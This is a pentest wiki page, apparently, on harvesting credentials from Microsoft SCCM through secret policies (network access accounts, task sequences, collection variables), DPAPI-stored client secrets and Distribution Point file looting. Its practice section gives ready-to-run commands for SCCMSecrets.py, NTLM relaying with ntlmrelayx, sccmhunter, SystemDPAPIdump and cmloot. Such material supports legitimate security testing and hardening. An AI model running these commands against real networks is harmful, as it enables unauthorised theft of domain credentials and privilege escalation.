Credential harvesting

Theory

For more details on this subject, see this Synacktiv article.

This blogpost also contains useful information on the topic.

For additional attack techniques and defense strategies related to credential harvesting in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:

• CRED-1: PXE Credentials
• CRED-2: Policy Request Credentials
• CRED-3: DPAPI Credentials
• CRED-4: Legacy Credentials
• CRED-5: Site Database Credentials
• CRED-6: Looting Distribution Points
• CRED-7: AdminService API Credentials
• CRED-8: Policy Creds MP Relay

An SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.

Secret policies: Network Access Accounts (NAAs), Task sequences and Collection variables

Some policies may contain sensitive data and are tagged as secret policies. Only registered SCCM devices in the approved state may request them. By default in SCCM, two device registration endpoints are available on the Management Point (MP): http://<MP>/ccm_system/request and http://<MP>/ccm_system_windowsauth/request. The first one is unauthenticated, meaning that anyone can generate a self-signed certificate and register an arbitrary device; however, by default, devices registered through this endpoint are not approved, which means that they cannot request secret policies. The second endpoint is authenticated and requires credentials for a domain computer account; devices registered through this endpoint are, by default, automatically approved.

This concretely means that an attacker that has a machine account or that is able to relay one can register an approved device and dump secret policies. Also, note that it is possible for sysadmins to misconfigure SCCM in order to automatically approve any device registering through the unauthenticated registration endpoint. In that case, an unauthenticated attacker on the network could dump secret policies.

Three kinds of policies are tagged as secret and can contain credentials:

• Network Access Accounts (NAAs): NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. NAA does not need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts. NAA credentials are distributed via secret policies.
• Task sequences: Task sequences are automated workflows that can be deployed by administrators on client devices and that will execute a series of steps. Various task sequence steps require or give the possibility to the administrator to provide domain credentials in order to execute them. They are distributed via secret policies.
• Collection variables: In SCCM, it is possible to associate variables to specific collections of devices. These variables can be used to customize deployments, scripts, or configurations for all members of the collection. They may contain credentials and are distributed via secret policies.

Note that the SCCM Management Point may be hardened and configured to enforce the use of HTTPS for client interaction. When this is the case, client certificate authentication with a domain PKI client certificate will be required by the Management Point.

Distribution Points resources

Policies may reference external resources hosted on a Distribution Point. These resources may be applications, OS images, but also configuration files, PowerShell scripts, certificates, or other kind of file susceptible to contain sensitive technical information such as credentials.

Distribution Point primarily distributes resources via SMB and HTTP. By default, valid domain credentials must be provided to access hosted resources.

This concretely means that an attacker with any domain account can fetch Distribution Point resources. In addition, it is possible for sysadmins to misconfigure SCCM Distribution Points to allow anonymous access to resources. Note that anonymous access only works with the HTTP protocol, and retrieving Distribution Point resources via SMB always requires authentication, even with anonymous access configured.

SCCM Distribution Points may also be configured to enforce the use of HTTPS. Again, when this is the case, client certificate authentication will be required by the Distribution Point with a domain PKI client certificate.

Practice

As noted in the Theory section, secrets can be harvested from SCCM secret policies, or Distribution Point resources.

Secret SCCM policies

Only approved SCCM devices can fetch secret policies. It is first possible to register a device ourselves by providing domain machine account credentials (or exploiting automatic device approval).

To this end, SCCMSecrets.py (Python) can be used. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped. This tool also supports HTTPS / client certificate authentication.

# Plain HTTP
python3 SCCMSecrets.py policies -mp "http://$MP_IP" -u "$MACHINE_NAME" -p "$MACHINE_PASSWORD" -cn "newdevice"

# HTTPS with client certificate
python3 SCCMSecrets.py policies -mp https://$MP_IP -u '$MACHINE_NAME' -p '$MACHINE_PASSWORD' -cn 'newdevice' --pki-cert ./cert.pem --pki-key ./key.pem

Note that if you do not provide machine account credentials, SCCMSecrets.py will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.

This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.

python3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/ccm_system_windowsauth/request' -smb2support --sccm-policies -debug

Finally, this attack was first inspired by @xpn_'s work (refer to this blogpost). The tool associated with the blogpost, sccmwtf (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.

The sccmhunter (Python) tool also implements sccmwtf, but with the same limitations.

#Create a new computer account and request the policies
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto

#To use an already controlled computer account
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP

Instead of registering a new device, it is also possible to use an already compromised SCCM device in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collection variables than the default collections we dumped by registering a device ourselves.

In order to use a compromised SCCM device, it is first necessary to extract the SCCM certificates from the machine. More details on how to do this here.

With the SCCM device private key and GUID, SCCMSecrets.py (Python) can be used to impersonate the device and dump secret policies (in the example below, the compromised_device/ folder contains the key.pem and guid.txt files).

All secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.

# Plain HTTP
python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/

# HTTPS with client certificate authentication
python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/ --pki-cert cert.pem --pki-key key.pem

Finally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see this SpecterOps article). The same behaviour can be observed for Task sequences and Collection variables.

As a result, it is possible to retrieve policies secrets locally on compromised devices.

Using a local administrator account, SystemDPAPIdump.py (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as sccmhunter.py (Python).

SystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN

python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi

Distribution Point resources

By default, any authenticated user can retrieve Distribution Point resources which may contain secrets.

Resources can be downloaded through the SMB or HTTP protocols.

As previously mentioned, note that if anonymous access was configured on a Distribution Point, only the HTTP protocol can be used to download files without any credentials.

HTTP

Regarding the HTTP protocol on Unix, SCCMSecrets.py (Python) can be used to index and download files from Distribution Points.

Not providing any credentials will attempt to exploit anonymous access on the Distribution Point. HTTPS and client authentication is also supported by this tool.

# Attempts to exploit anonymous access to index and download files
python3 SCCMSecrets.py files -dp http://$DP_IP

# Downloads files with specific extensions 
python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -H '$HASH' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'

# Having indexed files first, downloads specific files from the Distribution Point
python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -p '$PASSWORD' --urls to_download.lst

# Perform file dump attack via HTTPS and client certificate authentication
python3 SCCMSecrets.py files -dp https://$DP_IP -u '$USER' -p '$PASSWORD' --pki-cert ./cert.pem --pki-key ./key.pem

If anonymous access is enabled on the Distribution Point, sccm-http-looter (Golang) can also be used. It may be faster as it is written in Golang.

./sccm-http-looter -server 10.10.10.10

This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account.

python3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug

SMB

Regarding the SMB protocol, cmloot.py (Python) can be used to dump files.

# Enumerate SCCM servers, build inventory and download
python3 cmloot.py $DOMAIN/$USER@$TARGET -findsccmservers -target-file sccmhosts.txt -cmlootdownload sccmfiles.txt

Resources

https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/

https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial

https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9

https://blog.xpnsec.com/unobfuscating-network-access-accounts/

https://github.com/subat0mik/Misconfiguration-Manager/tree/main/attack-techniques/CRED